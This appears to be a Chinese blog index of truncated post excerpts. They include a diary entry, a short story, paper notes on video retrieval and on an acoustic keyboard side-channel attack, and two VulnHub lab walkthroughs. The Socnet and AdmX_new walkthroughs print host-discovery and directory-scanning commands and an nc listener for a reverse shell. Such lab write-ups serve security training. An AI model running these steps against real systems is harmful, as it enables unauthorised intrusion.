一篇流水账——那些流经我的回忆-5
“荒原狼”在回学校的火车上,邻座两个四川口音浓重的大叔在彼此诉说要回家的兴奋。火车抵达张掖后,其中一位大叔表示,火车驶出酒泉之后就再也看不见荒漠和尘土了,另一位也赶快附和。作为家乡的代言人,我本想为酒泉辩护两句,可在自己所有认知中搜索了一遍,还真找不出反驳的理由。西北的干旱是有目共睹的,尤其是今年——降水量明显少了,沙尘暴却多了。所有从外地来此的人——无论是工作、旅游甚至是求学都会对此产生极其严重的不适感:打喷嚏、鼻炎、沙眼……
火车上无聊,看起了B站杜素娟教授的推荐书单。一本名为“荒原狼”的书吸引了我。看着窗外的荒滩,我瞬间想起了杨惠显《夹边沟记事》中对70年前夹边沟农场附近荒滩的描写,想到了无人区漫无目的闲逛的狼群。抱着找点认同感的想法,回校第一件事便是借来了赫尔曼黑塞的这本小说,但它给我带来的更多是落差感,然后就是认同感。
开学第一周很忙,收拾了寝室,考了教资,见了同学,然后就这么过去了。
老东西暑假时,看到学校的广播站在发招新宣传,我当即就决定加入。原因有二:第一,我需要时刻提醒自己还有这样一个爱好,以免失去热情;第二,我需要满足一种“猎奇”心——招新组一般会将“23 ...
四十来岁
任何事物被人铭记,都是因为它有对应的价值,就算没有价值,至少也得有点别于常人的特征。他的邻居——同样居住在高楼最上层的左户,很容易被街坊认出来,因为那家伙有着看一眼就难以忘却的高高隆起的额头;他的对门,在很久以前的旧时代经常被人当作是朝圣的地方,因此故人留下的东西让这一户也有了足够支撑生活的基础;他的楼下刚好是采光最好的一户,那儿的住户刚好赶上了选房热潮,又刚好选中了最抢手的位置,占据了天时地利人和。我对他的印象,就是个四十来岁的中年人,可他到底有多老,我到现在也没弄清楚,因为他有二三十多岁年轻人的相貌,但有时候行为却如同60岁的老人一样缓慢老气——索性取个中间值四十来岁吧。总的来说,在整个楼里,他绝对是最不起眼、最不容易被人记住的那种类型。唯一能够拿得出手给大伙看看的,是他家里那些旧壁画,可这些壁画也被他珍藏在了阁楼的角落,客人想要看看,就一定要穿过他家客厅长长的走廊,直到整间房子的尽头。阁楼到处都是尘土,偶尔路过的一阵微风都能让那些灰尘在清澈的阳光下起舞,对此他的解释是:经常打扫,但灰尘太大,刚收拾完,就又恢复原样了。
他是有价值的。除去阁楼上的那些老物件以外 ...
【论文阅读】CLIP4Clip:端到端视频检索的CLIP实证研究
论文信息:Luo H , Ji L , Zhong M ,et al.CLIP4Clip: An Empirical Study of CLIP for End to End Video Clip Retrieval[J]. 2021.DOI:10.48550/arXiv.2104.08860.
源码: https://github.com/ArrowLuo/CLIP4Clip.
试验方案:https://github.com/towhee-io/examples/blob/main/video/text_video_retrieval/1_text_video_retrieval_engine.ipynb
文章概述
先说下CLIP:CLIP全称Constrastive Language-Image Pre-training,是OPAI推出的采用对比学习的文本-图像预训练模型。预训练方法即如上图,模型由两个编码器组成,即文本+图像,以大量文本-图像对为输入,走各自编码器得到各自的特征,计算两者之间的cos相似度,让配对的相似度越近,不配对的越远。
回归正题,本文提出了CLIP4Clip ...
【论文阅读】Grounding Spatio-Temporal Language with Transformers
文章信息:Karch T , Teodorescu L , Hofmann K ,et al.Grounding Spatio-Temporal Language with Transformers[J]. 2021.DOI:10.48550/arXiv.2106.08858.
文章概述虽然有大量文献研究机器如何学习基础语言,但如何学习时空语言概念的主题在很大程度上仍然是未知的。为了在这一方向上取得进展,我们引入了一种新的时空语言基础任务,目的是学习具身主体行为痕迹的时空描述的意义。这是通过训练一个真值函数来实现的,该函数预测描述是否与给定的观察历史相匹配。这些描述包括过去时和现在时的时间扩展谓词以及对场景中对象的时空引用。为了研究架构偏差在该任务中的作用,我们训练了几个模型,包括多模态Transformer架构;后者在空间和时间上实现了单词和对象之间不同的注意力计算。我们在两类泛化上测试模型:1)对随机伸出句子的泛化;2)归纳到语法原语。我们观察到,在我们的transformer的注意力计算中保持对象身份有助于在总体上实现良好的泛化性能,并且在单个令牌中汇总对象跟踪对性能的影响很小。 ...
【论文阅读】TALL:通过自然语言定位时间活动
论文信息:Gao J , Sun C , Yang Z ,et al.TALL: Temporal Activity Localization via Language Query[J].arXiv e-prints, 2017.DOI:10.1109/iccv.2017.563.
代码:https://github.com/WuJie1010/Awesome-Temporally-Language-Grounding
1实现自然语言定位活动的挑战有以下几个方面:1)符合需求的多模态(语言查询和动作定位)表现;2)根据细度有限的特征准确地完成任务。我们提出了一种跨模态的时间回归定位器来联合两种模型,输出指定视频片段的对齐分数和动作边界回归结果。
传统的定位方法多使用基于光学流或者卷积神经网络训练的分类器,并且以滑动窗口的方式实现。一种支持自然语言查询的直接实现方式是吧查询分为离散的标签集合,然而要设计一种能够照顾大范围活动且不会丢失用户查询中的重要信息的标签集合并不容易。
为了能够解决离散活动标签的问题,一种可能的办法是将可视特征和句意特征都嵌入一个空间(common space),但 ...
【论文阅读】基于深度学习的键盘声学侧信道攻击
论文信息:Harrison, Joshua J. et al. “A Practical Deep Learning-Based Acoustic Side Channel Attack on Keyboards.” 2023 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW) (2023): 270-280.
背景侧信道攻击(SCA,Side Channel Attack)利用了设备所产生的许多信号,其中包含了电磁波、电量消耗、移动传感器以及声音。有研究指出无线键盘产生可检测且可读的电磁波,但敲击键盘所产生的声音(keystroke)更加普遍且更容易被利用,并且也是人们疏于防范的因素之一。
尽管键盘已经越来越不怎么被提及,能够利用其声学特点的技术却在发展。比如带着VoIP协议的带有麦克风的电子设备(如智能手表等)
深度学习(DL)为机器学习(ML)的一个子类,其模型含有互联神经元的多个层。虽然DL在上世纪60年代就已经在计算机领域蓬勃发展,但直到2010年左右,趁着图形处理技术、图像识别技术 ...
【论文阅读】基于对比学习的视频片段检索
论文信息:Zhang, Hao et al. “Video Corpus Moment Retrieval with Contrastive Learning.” Proceedings of the 44th International ACM SIGIR Conference on Research and Development in Information Retrieval (2021): n. pag.
摘要+引言部分 视频语料库片段检索(Video Corpus Moment Retrieval,VCMR)的目的是通过给定查询语句的语义查找对应的视频时域片段。由于视频和文本信息来自两个不同的特征空间,如何实现VCMR有两种基本方式:(i)独立加码每个模型的输出,然后将两个模型输出按顺序执行(原文表述为align,在前几篇论文中则表述为前一模型的输出为后一模型的输入)、(ii)使用细粒度跨模态交互。在本文提出的ReLoCLNet(Retrieval and Localization Network with Contrastive Learning)中采取第 ...
【打靶】AdmX_new
靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z
信息搜集及主机发现主机发现nmap -sn 192.168.40.0/24
netdiscover -r 192.168.40.0/24
这里再记录一工具arping,相较于arp-scan它范围更广,配合简单的bash使用。
for i in $(seq 1 256);do sudo arping -c 1 192.168.40.$i;done
kali:192.168.40.148
靶机:192.168.40.150
信息搜集靶机端口、服务、操作系统探测nmap -sV -p- -O 192.168.40.150
主机只开放了80端口,访问后为apache的默认配置界面。
目录爆破dirsearch -u 192.168.40.150:80
80端口下存在/wordpress 以及该目录下的wp-login.php
再对/wordpress目录进行扫描,发现存在大量子目录,包含疑似管理页面wp-admin
尝试访问wp-admin,发现存在一些重定向操作和一个不存在的ip ...
【论文阅读】mTVL:支持多语言的视频片段检索
论文原标题: Lei J , Berg T L , Bansal M .MTVR: Multilingual Moment Retrieval in Videos[J]. 2021.DOI:10.48550/arXiv.2108.00061.
源码:https://github.com/jayleicn/mTVRetrieval
摘要及引言:采用数据集MTVR:一种在TVR数据集的基础上增加了相应的中文查询和标题,包含了对21.8K条视频的218K条英语和中文的查询,是最大的视频检索数据集,且支持对话检索(以字幕的形式)。
提出了mXML:一个支持双语言的多片段检索模型,它通过参数共享和限制语言邻域在数据集上执行操作和训练。在XML(by Lei,2020)的基础上加入了参数共享(by Sachan and Neubig,2018;Dong,2015)使得两个语言可以用统一的解码器解码。引入语言邻域限制(by Wang,2018;Kim,2020)到查询输出和字幕嵌入,使得语义相同的不同语言的两句话在嵌入位置上更加相近。
文章首先指出了当前研究的不足之处:仅仅面向单一语言(英语),且不 ...
【打靶】Socnet
靶机下载地址:https://download.vulnhub.com/boredhackerblog/medium_socnet.ova
主机探测arp-scan -l
nmap -sn 192.168.40.0/16
kali:192.168.40.148
靶机:192.168.40.149
开始时没能使用工具扫描到靶机ip,最后才发现是因为VMware默认采用了桥接模式而非NAT模式将其接入网络。
进一步信息收集1.端口、服务、操作系统探测nmap -sV -sC -O 192.168.40.149
目标开放了22、5000端口,在5000端口运行了一个由python2编写的http服务“Werkzeug”。在按照提示输入少于4字符长度的信息时会提示输入不够长
2.目录扫描dirsearch -u 192.168.40.149:5000
对5000端口进行目录扫描,发现一个/admin目录,访问,内有一个可执行python代码的入口。
尝试利用1.利用python来反弹shell先在kali监听5555端口:
nc -lvnp 5555
在网页执行:
123456789i ...